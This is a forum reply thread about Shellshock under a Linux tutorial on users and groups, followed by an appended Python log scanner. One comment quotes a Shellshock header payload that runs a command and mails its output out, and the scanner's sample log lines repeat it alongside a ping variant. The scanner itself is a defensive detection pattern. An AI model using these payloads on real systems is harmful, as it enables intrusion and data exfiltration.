RE: Linux Tutorial - Understanding User and Group

in #utopian-io, 7 years ago

Yeah I saw some people mail themselves the content of these two files with either mail like this:

() { :;}; /bin/bash -c \"whoami | mail -s 'example.com l' [email protected]

Obviously the command had to be adapted a bit and you had to have a few things set up in a certain way for this to work. I also saw some more creative data exfiltration methods mentioned here: https://www.reddit.com/r/AskNetsec/comments/39a8my/how_to_exploit_shellshock_with_only_ping/ such as using ping :)

Thanks for the interesting post. Will be following you. I'm gonna post this on reddit.com/r/linux_mentor. https://blog.cloudflare.com/inside-shellshock/

There is always a way for those who are persistent in finding ways to penetrate a system. The Shellshock case also shows how vulnerabilities can be exploited for negative things. Thanks for sharing the informative link about pentesting. Two thumbs up for you.
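
A defender-side check for the payload shape quoted in the first comment, added here as an example and not part of the thread: it scans Apache-style access log lines for a bash function definition (`() {`) in any quoted field and records whether the trailing command mentions `mail` or `ping`, the two channels named above. The log lines, addresses, placeholder mailbox and the `scan_line`/`scan` names are constructed for illustration.

```python
import re

# A quoted log field containing a bash function definition, "() {", has the
# Shellshock payload shape shown in the thread.
FUNC_DEF = re.compile(r"\(\s*\)\s*\{")
# Double-quoted log fields; Apache writes embedded quotes as \" so escaped
# characters are skipped instead of ending the field early.
QUOTED = re.compile(r'"((?:[^"\\]|\\.)*)"')
# Outbound channels named in the thread (assumption: extend for your environment).
CHANNELS = {"mail": re.compile(r"\bmail\b"), "ping": re.compile(r"\bping\b")}


def scan_line(line):
    """Return None for a clean line, else a dict describing the suspicious field."""
    for index, value in enumerate(QUOTED.findall(line)):
        match = FUNC_DEF.search(value)
        if not match:
            continue
        trailer = value[match.end():]  # command text after the function definition
        channels = sorted(n for n, rx in CHANNELS.items() if rx.search(trailer))
        # field index: 0 = request line, 1 = Referer, 2 = User-Agent (combined format)
        return {"client": line.split(" ", 1)[0], "field": index, "channels": channels}
    return None


def scan(lines):
    """Scan an iterable of log lines and return only the hits."""
    return [hit for hit in map(scan_line, lines) if hit]


# Constructed sample lines: documentation IP ranges and a placeholder mailbox.
SAMPLE = [
    r'''198.51.100.7 - - [01/Jan/2015:10:00:00 +0000] "GET /cgi-bin/status HTTP/1.1" 200 12 "-" "() { :;}; /bin/bash -c \"whoami | mail -s 'example.com l' user@example.invalid\""''',
    r'''203.0.113.9 - - [01/Jan/2015:10:00:05 +0000] "GET / HTTP/1.1" 200 5 "() { :;}; ping -c 1 192.0.2.10" "curl/7.0"''',
    r'''192.0.2.55 - - [01/Jan/2015:10:00:09 +0000] "GET /mail/inbox HTTP/1.1" 200 900 "-" "Mozilla/5.0 (X11; Linux x86_64)"''',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

The third sample line is benign on purpose: a `/mail/` path and a parenthesised User-Agent do not match, because the function-definition pattern has to be present before the channel keywords are considered.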